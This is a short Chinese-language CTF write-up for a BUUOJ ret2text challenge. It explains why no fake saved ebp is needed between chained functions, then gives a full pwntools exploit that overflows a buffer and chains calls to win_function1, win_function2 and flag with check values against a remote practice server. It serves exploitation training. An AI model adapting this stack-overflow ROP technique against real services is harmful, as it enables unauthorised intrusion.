简单的ret2text
写一下的主要原因是,构造rop链的时候想到win2函数中还要覆盖ebp,后来想清楚了,不需要覆盖,因为函数开始的push ebp; mov ebp, esp
两个和最后的leave
抵消了。
完整exploit
from pwn import *

# Target binary and remote service, exactly as given in the writeup.
context.binary = './bin'
elf = context.binary
conn = remote('node4.buuoj.cn',25223)

# Resolve the functions the chain calls from the ELF symbol table.
win1 = elf.sym['win_function1']
win2 = elf.sym['win_function2']
flag = elf.sym['flag']

# Wait for the service's prompt before sending anything.
conn.recvuntil(b'> ')

# Overflow padding: presumably 0x18 bytes of buffer plus the 4-byte saved
# ebp — the split is the author's; verify against the binary's stack frame.
padding = b'a' * (0x18 + 4)

# Return-address chain. No fake saved-ebp cell is placed between the
# chained functions: each callee's `push ebp; mov ebp, esp` is undone by
# its `leave`, so supplying one is unnecessary (the author's point above).
# 0xBAAAAAAD / 0xDEADBAAD are presumably the values the binary checks —
# confirm in the disassembly.
chain = b''.join(p32(word) for word in (win1, win2, flag, 0xBAAAAAAD, 0xDEADBAAD))

conn.sendline(padding + chain)
conn.interactive()